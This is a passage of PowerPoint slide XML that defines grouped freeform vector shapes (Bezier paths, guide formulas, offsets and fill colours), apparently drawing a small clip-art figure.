                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 23 w 137"/>
                  <a:gd name="T1" fmla="*/ 3 h 173"/>
                  <a:gd name="T2" fmla="*/ 11 w 137"/>
                  <a:gd name="T3" fmla="*/ 11 h 173"/>
                  <a:gd name="T4" fmla="*/ 0 w 137"/>
                  <a:gd name="T5" fmla="*/ 68 h 173"/>
                  <a:gd name="T6" fmla="*/ 20 w 137"/>
                  <a:gd name="T7" fmla="*/ 75 h 173"/>
                  <a:gd name="T8" fmla="*/ 21 w 137"/>
                  <a:gd name="T9" fmla="*/ 69 h 173"/>
                  <a:gd name="T10" fmla="*/ 28 w 137"/>
                  <a:gd name="T11" fmla="*/ 84 h 173"/>
                  <a:gd name="T12" fmla="*/ 28 w 137"/>
                  <a:gd name="T13" fmla="*/ 150 h 173"/>
                  <a:gd name="T14" fmla="*/ 37 w 137"/>
                  <a:gd name="T15" fmla="*/ 160 h 173"/>
                  <a:gd name="T16" fmla="*/ 82 w 137"/>
                  <a:gd name="T17" fmla="*/ 172 h 173"/>
                  <a:gd name="T18" fmla="*/ 104 w 137"/>
                  <a:gd name="T19" fmla="*/ 152 h 173"/>
                  <a:gd name="T20" fmla="*/ 106 w 137"/>
                  <a:gd name="T21" fmla="*/ 66 h 173"/>
                  <a:gd name="T22" fmla="*/ 108 w 137"/>
                  <a:gd name="T23" fmla="*/ 84 h 173"/>
                  <a:gd name="T24" fmla="*/ 110 w 137"/>
                  <a:gd name="T25" fmla="*/ 92 h 173"/>
                  <a:gd name="T26" fmla="*/ 137 w 137"/>
                  <a:gd name="T27" fmla="*/ 88 h 173"/>
                  <a:gd name="T28" fmla="*/ 131 w 137"/>
                  <a:gd name="T29" fmla="*/ 43 h 173"/>
                  <a:gd name="T30" fmla="*/ 104 w 137"/>
                  <a:gd name="T31" fmla="*/ 18 h 173"/>
                  <a:gd name="T32" fmla="*/ 71 w 137"/>
                  <a:gd name="T33" fmla="*/ 9 h 173"/>
                  <a:gd name="T34" fmla="*/ 41 w 137"/>
                  <a:gd name="T35" fmla="*/ 1 h 173"/>
                  <a:gd name="T36" fmla="*/ 23 w 137"/>
                  <a:gd name="T37" fmla="*/ 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7" h="173">
                    <a:moveTo>
                      <a:pt x="23" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="4"/>
                      <a:pt x="12" y="7"/>
                      <a:pt x="11" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="13"/>
                      <a:pt x="5" y="39"/>
                      <a:pt x="0" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="72"/>
                      <a:pt x="15" y="79"/>
                      <a:pt x="20" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="73"/>
                      <a:pt x="21" y="71"/>
                      <a:pt x="21" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="75"/>
                      <a:pt x="23" y="80"/>
                      <a:pt x="28" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="99"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="28" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="155"/>
                      <a:pt x="31" y="160"/>
                      <a:pt x="37" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="163"/>
                      <a:pt x="75" y="170"/>
                      <a:pt x="82" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="173"/>
                      <a:pt x="109" y="161"/>
                      <a:pt x="104" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="131"/>
                      <a:pt x="104" y="78"/>
                      <a:pt x="106" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="66"/>
                      <a:pt x="108" y="78"/>
                      <a:pt x="108" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="87"/>
                      <a:pt x="109" y="89"/>
                      <a:pt x="110" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="95"/>
                      <a:pt x="132" y="92"/>
                      <a:pt x="137" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="134" y="67"/>
                      <a:pt x="132" y="50"/>
                      <a:pt x="131" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128" y="26"/>
                      <a:pt x="112" y="21"/>
                      <a:pt x="104" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="15"/>
                      <a:pt x="84" y="13"/>
                      <a:pt x="71" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="6"/>
                      <a:pt x="50" y="3"/>
                      <a:pt x="41" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="0"/>
                      <a:pt x="29" y="1"/>
                      <a:pt x="23" y="3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9" name="Freeform 2898"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1331" y="-3006"/>
                <a:ext cx="85" cy="385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 36"/>
                  <a:gd name="T1" fmla="*/ 62 h 163"/>
                  <a:gd name="T2" fmla="*/ 26 w 36"/>
                  <a:gd name="T3" fmla="*/ 10 h 163"/>
                  <a:gd name="T4" fmla="*/ 26 w 36"/>
                  <a:gd name="T5" fmla="*/ 1 h 163"/>
                  <a:gd name="T6" fmla="*/ 20 w 36"/>
                  <a:gd name="T7" fmla="*/ 0 h 163"/>
                  <a:gd name="T8" fmla="*/ 2 w 36"/>
                  <a:gd name="T9" fmla="*/ 2 h 163"/>
                  <a:gd name="T10" fmla="*/ 0 w 36"/>
                  <a:gd name="T11" fmla="*/ 69 h 163"/>
                  <a:gd name="T12" fmla="*/ 7 w 36"/>
                  <a:gd name="T13" fmla="*/ 83 h 163"/>
                  <a:gd name="T14" fmla="*/ 7 w 36"/>
                  <a:gd name="T15" fmla="*/ 149 h 163"/>
                  <a:gd name="T16" fmla="*/ 16 w 36"/>
                  <a:gd name="T17" fmla="*/ 159 h 163"/>
                  <a:gd name="T18" fmla="*/ 30 w 36"/>
                  <a:gd name="T19" fmla="*/ 163 h 163"/>
                  <a:gd name="T20" fmla="*/ 29 w 36"/>
                  <a:gd name="T21" fmla="*/ 6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163">
                    <a:moveTo>
                      <a:pt x="29" y="62"/>
                    </a:move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7"/>
                      <a:pt x="26" y="5"/>
                      <a:pt x="26" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="1"/>
                      <a:pt x="22" y="0"/>
                      <a:pt x="20" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="0"/>
                      <a:pt x="10" y="0"/>
                      <a:pt x="2" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="13"/>
                      <a:pt x="7" y="45"/>
                      <a:pt x="0" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="74"/>
                      <a:pt x="3" y="79"/>
                      <a:pt x="7" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="98"/>
                      <a:pt x="12" y="117"/>
                      <a:pt x="7" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="154"/>
                      <a:pt x="10" y="159"/>
                      <a:pt x="16" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="160"/>
                      <a:pt x="25" y="161"/>
                      <a:pt x="30" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="116"/>
                      <a:pt x="26" y="86"/>
                      <a:pt x="29" y="62"/>
                    </a:cubicBez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0" name="Freeform 2899"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1393" y="-2971"/>
                <a:ext cx="151" cy="371"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 5 h 157"/>
                  <a:gd name="T2" fmla="*/ 57 w 64"/>
                  <a:gd name="T3" fmla="*/ 2 h 157"/>
                  <a:gd name="T4" fmla="*/ 49 w 64"/>
                  <a:gd name="T5" fmla="*/ 0 h 157"/>
                  <a:gd name="T6" fmla="*/ 3 w 64"/>
                  <a:gd name="T7" fmla="*/ 47 h 157"/>
                  <a:gd name="T8" fmla="*/ 3 w 64"/>
                  <a:gd name="T9" fmla="*/ 47 h 157"/>
                  <a:gd name="T10" fmla="*/ 4 w 64"/>
                  <a:gd name="T11" fmla="*/ 148 h 157"/>
                  <a:gd name="T12" fmla="*/ 35 w 64"/>
                  <a:gd name="T13" fmla="*/ 156 h 157"/>
                  <a:gd name="T14" fmla="*/ 57 w 64"/>
                  <a:gd name="T15" fmla="*/ 136 h 157"/>
                  <a:gd name="T16" fmla="*/ 58 w 64"/>
                  <a:gd name="T17" fmla="*/ 54 h 157"/>
                  <a:gd name="T18" fmla="*/ 64 w 64"/>
                  <a:gd name="T19" fmla="*/ 5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4" h="157">
                    <a:moveTo>
                      <a:pt x="64" y="5"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="62" y="4"/>
                      <a:pt x="59" y="3"/>
                      <a:pt x="57" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="1"/>
                      <a:pt x="52" y="0"/>
                      <a:pt x="49" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="0"/>
                      <a:pt x="5" y="36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0" y="71"/>
                      <a:pt x="10" y="101"/>
                      <a:pt x="4" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="151"/>
                      <a:pt x="30" y="154"/>
                      <a:pt x="35" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="157"/>
                      <a:pt x="62" y="145"/>
                      <a:pt x="57" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="56" y="70"/>
                      <a:pt x="58" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="28"/>
                      <a:pt x="62" y="12"/>
                      <a:pt x="64" y="5"/>
                    </a:cubicBez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1" name="Freeform 2900"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1414" y="-2857"/>
                <a:ext cx="47" cy="82"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 7 w 20"/>
                  <a:gd name="T1" fmla="*/ 0 h 35"/>
                  <a:gd name="T2" fmla="*/ 20 w 20"/>
                  <a:gd name="T3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0" h="35">
                    <a:moveTo>
                      <a:pt x="7" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="8"/>
                      <a:pt x="0" y="29"/>
                      <a:pt x="20" y="35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2" name="Freeform 2901"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1322" y="-2905"/>
                <a:ext cx="45" cy="107"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 19"/>
                  <a:gd name="T1" fmla="*/ 45 h 45"/>
                  <a:gd name="T2" fmla="*/ 7 w 19"/>
                  <a:gd name="T3" fmla="*/ 9 h 45"/>
                  <a:gd name="T4" fmla="*/ 8 w 19"/>
                  <a:gd name="T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45">
                    <a:moveTo>
                      <a:pt x="19" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="39"/>
                      <a:pt x="3" y="18"/>
                      <a:pt x="7" y="9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3" name="Freeform 2902"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1322" y="-2905"/>
                <a:ext cx="45" cy="107"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 19"/>
                  <a:gd name="T1" fmla="*/ 45 h 45"/>
                  <a:gd name="T2" fmla="*/ 7 w 19"/>
                  <a:gd name="T3" fmla="*/ 9 h 45"/>
                  <a:gd name="T4" fmla="*/ 8 w 19"/>
                  <a:gd name="T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45">
                    <a:moveTo>
                      <a:pt x="19" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="39"/>
                      <a:pt x="3" y="18"/>
                      <a:pt x="7" y="9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4" name="Freeform 2903"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1355" y="-3150"/>
                <a:ext cx="172" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 73"/>
                  <a:gd name="T1" fmla="*/ 1 h 73"/>
                  <a:gd name="T2" fmla="*/ 1 w 73"/>
                  <a:gd name="T3" fmla="*/ 38 h 73"/>
                  <a:gd name="T4" fmla="*/ 38 w 73"/>
                  <a:gd name="T5" fmla="*/ 72 h 73"/>
                  <a:gd name="T6" fmla="*/ 73 w 73"/>
                  <a:gd name="T7" fmla="*/ 35 h 73"/>
                  <a:gd name="T8" fmla="*/ 35 w 73"/>
                  <a:gd name="T9" fmla="*/ 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3" h="73">
                    <a:moveTo>
                      <a:pt x="35" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="2"/>
                      <a:pt x="0" y="18"/>
                      <a:pt x="1" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="58"/>
                      <a:pt x="18" y="73"/>
                      <a:pt x="38" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="71"/>
                      <a:pt x="73" y="55"/>
                      <a:pt x="73" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="15"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="35" y="1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5" name="Freeform 2904"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1355" y="-3150"/>
                <a:ext cx="172" cy="172"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 35 w 73"/>
                  <a:gd name="T1" fmla="*/ 1 h 73"/>
                  <a:gd name="T2" fmla="*/ 1 w 73"/>
                  <a:gd name="T3" fmla="*/ 38 h 73"/>
                  <a:gd name="T4" fmla="*/ 38 w 73"/>
                  <a:gd name="T5" fmla="*/ 72 h 73"/>
                  <a:gd name="T6" fmla="*/ 73 w 73"/>
                  <a:gd name="T7" fmla="*/ 35 h 73"/>
                  <a:gd name="T8" fmla="*/ 35 w 73"/>
                  <a:gd name="T9" fmla="*/ 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3" h="73">
                    <a:moveTo>
                      <a:pt x="35" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="2"/>
                      <a:pt x="0" y="18"/>
                      <a:pt x="1" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="58"/>
                      <a:pt x="18" y="73"/>
                      <a:pt x="38" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="71"/>
                      <a:pt x="73" y="55"/>
                      <a:pt x="73" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="15"/>
                      <a:pt x="55" y="0"/>
                      <a:pt x="35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6" name="Freeform 2905"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1331" y="-3162"/>
                <a:ext cx="243" cy="203"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 88 w 103"/>
                  <a:gd name="T1" fmla="*/ 60 h 86"/>
                  <a:gd name="T2" fmla="*/ 58 w 103"/>
                  <a:gd name="T3" fmla="*/ 6 h 86"/>
                  <a:gd name="T4" fmla="*/ 9 w 103"/>
                  <a:gd name="T5" fmla="*/ 39 h 86"/>
                  <a:gd name="T6" fmla="*/ 9 w 103"/>
                  <a:gd name="T7" fmla="*/ 39 h 86"/>
                  <a:gd name="T8" fmla="*/ 0 w 103"/>
                  <a:gd name="T9" fmla="*/ 58 h 86"/>
                  <a:gd name="T10" fmla="*/ 16 w 103"/>
                  <a:gd name="T11" fmla="*/ 61 h 86"/>
                  <a:gd name="T12" fmla="*/ 11 w 103"/>
                  <a:gd name="T13" fmla="*/ 38 h 86"/>
                  <a:gd name="T14" fmla="*/ 30 w 103"/>
                  <a:gd name="T15" fmla="*/ 26 h 86"/>
                  <a:gd name="T16" fmla="*/ 57 w 103"/>
                  <a:gd name="T17" fmla="*/ 58 h 86"/>
                  <a:gd name="T18" fmla="*/ 91 w 103"/>
                  <a:gd name="T19" fmla="*/ 75 h 86"/>
                  <a:gd name="T20" fmla="*/ 88 w 103"/>
                  <a:gd name="T21" fmla="*/ 6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3" h="86">
                    <a:moveTo>
                      <a:pt x="88" y="60"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="88" y="33"/>
                      <a:pt x="82" y="13"/>
                      <a:pt x="58" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="0"/>
                      <a:pt x="7" y="12"/>
                      <a:pt x="9" y="39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8" y="44"/>
                      <a:pt x="9" y="61"/>
                      <a:pt x="0" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="62"/>
                      <a:pt x="24" y="69"/>
                      <a:pt x="16" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="58"/>
                      <a:pt x="10" y="44"/>
                      <a:pt x="11" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="28"/>
                      <a:pt x="20" y="26"/>
                      <a:pt x="30" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="26"/>
                      <a:pt x="68" y="38"/>
                      <a:pt x="57" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="77"/>
                      <a:pt x="80" y="86"/>
                      <a:pt x="91" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="64"/>
                      <a:pt x="88" y="70"/>
                      <a:pt x="88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7" name="Freeform 2906"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1352" y="-2782"/>
                <a:ext cx="52" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 22"/>
                  <a:gd name="T1" fmla="*/ 0 h 15"/>
                  <a:gd name="T2" fmla="*/ 1 w 22"/>
                  <a:gd name="T3" fmla="*/ 10 h 15"/>
                  <a:gd name="T4" fmla="*/ 22 w 22"/>
                  <a:gd name="T5" fmla="*/ 15 h 15"/>
                  <a:gd name="T6" fmla="*/ 21 w 22"/>
                  <a:gd name="T7" fmla="*/ 6 h 15"/>
                  <a:gd name="T8" fmla="*/ 0 w 22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0" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="1" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="11"/>
                      <a:pt x="15" y="13"/>
                      <a:pt x="22" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="12"/>
                      <a:pt x="22" y="9"/>
                      <a:pt x="21" y="6"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="4"/>
                      <a:pt x="6" y="2"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFED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8" name="Freeform 2907"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1402" y="-2782"/>
                <a:ext cx="120" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 51"/>
                  <a:gd name="T1" fmla="*/ 21 h 21"/>
                  <a:gd name="T2" fmla="*/ 50 w 51"/>
                  <a:gd name="T3" fmla="*/ 10 h 21"/>
                  <a:gd name="T4" fmla="*/ 51 w 51"/>
                  <a:gd name="T5" fmla="*/ 0 h 21"/>
                  <a:gd name="T6" fmla="*/ 27 w 51"/>
                  <a:gd name="T7" fmla="*/ 11 h 21"/>
                  <a:gd name="T8" fmla="*/ 1 w 51"/>
                  <a:gd name="T9" fmla="*/ 6 h 21"/>
                  <a:gd name="T10" fmla="*/ 0 w 51"/>
                  <a:gd name="T11" fmla="*/ 6 h 21"/>
                  <a:gd name="T12" fmla="*/ 1 w 51"/>
                  <a:gd name="T13" fmla="*/ 15 h 21"/>
                  <a:gd name="T14" fmla="*/ 1 w 51"/>
                  <a:gd name="T15" fmla="*/ 15 h 21"/>
                  <a:gd name="T16" fmla="*/ 27 w 51"/>
                  <a:gd name="T1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1" h="21">
                    <a:moveTo>
                      <a:pt x="27" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="21"/>
                      <a:pt x="45" y="14"/>
                      <a:pt x="50" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="6"/>
                      <a:pt x="51" y="3"/>
                      <a:pt x="51" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="3"/>
                      <a:pt x="35" y="11"/>
                      <a:pt x="27" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="11"/>
                      <a:pt x="12" y="9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9"/>
                      <a:pt x="1" y="12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3" y="18"/>
                      <a:pt x="24" y="21"/>
                      <a:pt x="27" y="21"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFED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9" name="Freeform 2908"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1404" y="-2680"/>
                <a:ext cx="121" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 49 w 51"/>
                  <a:gd name="T1" fmla="*/ 0 h 19"/>
                  <a:gd name="T2" fmla="*/ 28 w 51"/>
                  <a:gd name="T3" fmla="*/ 8 h 19"/>
                  <a:gd name="T4" fmla="*/ 1 w 51"/>
                  <a:gd name="T5" fmla="*/ 2 h 19"/>
                  <a:gd name="T6" fmla="*/ 1 w 51"/>
                  <a:gd name="T7" fmla="*/ 2 h 19"/>
                  <a:gd name="T8" fmla="*/ 0 w 51"/>
                  <a:gd name="T9" fmla="*/ 13 h 19"/>
                  <a:gd name="T10" fmla="*/ 1 w 51"/>
                  <a:gd name="T11" fmla="*/ 13 h 19"/>
                  <a:gd name="T12" fmla="*/ 28 w 51"/>
                  <a:gd name="T13" fmla="*/ 19 h 19"/>
                  <a:gd name="T14" fmla="*/ 51 w 51"/>
                  <a:gd name="T15" fmla="*/ 9 h 19"/>
                  <a:gd name="T16" fmla="*/ 49 w 5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1" h="19">
                    <a:moveTo>
                      <a:pt x="49" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="4"/>
                      <a:pt x="35" y="8"/>
                      <a:pt x="28" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="8"/>
                      <a:pt x="14" y="6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6"/>
                      <a:pt x="0" y="9"/>
                      <a:pt x="0" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="13"/>
                      <a:pt x="0" y="13"/>
                      <a:pt x="1" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="16"/>
                      <a:pt x="25" y="19"/>
                      <a:pt x="28" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="19"/>
                      <a:pt x="44" y="14"/>
                      <a:pt x="51" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="6"/>
                      <a:pt x="49" y="3"/>
                      <a:pt x="49" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFED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0" name="Freeform 2909"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1350" y="-2687"/>
                <a:ext cx="57" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 24"/>
                  <a:gd name="T1" fmla="*/ 0 h 16"/>
                  <a:gd name="T2" fmla="*/ 0 w 24"/>
                  <a:gd name="T3" fmla="*/ 10 h 16"/>
                  <a:gd name="T4" fmla="*/ 23 w 24"/>
                  <a:gd name="T5" fmla="*/ 16 h 16"/>
                  <a:gd name="T6" fmla="*/ 24 w 24"/>
                  <a:gd name="T7" fmla="*/ 5 h 16"/>
                  <a:gd name="T8" fmla="*/ 2 w 24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6">
                    <a:moveTo>
                      <a:pt x="2" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="3"/>
                      <a:pt x="1" y="6"/>
                      <a:pt x="0" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="12"/>
                      <a:pt x="15" y="14"/>
                      <a:pt x="23" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="12"/>
                      <a:pt x="24" y="9"/>
                      <a:pt x="24" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="3"/>
                      <a:pt x="8" y="1"/>
                      <a:pt x="2" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFED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1" name="Freeform 2910"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1456" y="-2855"/>
                <a:ext cx="22" cy="5"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 22"/>
                  <a:gd name="T1" fmla="*/ 5 h 5"/>
                  <a:gd name="T2" fmla="*/ 0 w 22"/>
                  <a:gd name="T3" fmla="*/ 0 h 5"/>
                  <a:gd name="T4" fmla="*/ 22 w 2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">
                    <a:moveTo>
                      <a:pt x="22" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="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2" name="Line 2911"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1" flipV="1">
                <a:off x="1456" y="-2855"/>
                <a:ext cx="22" cy="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943" name="Group 2934"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3646854" y="2864863"/>
              <a:ext cx="212725" cy="506412"/>
              <a:chOff x="1157" y="-3187"/>
              <a:chExt cx="470" cy="1120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
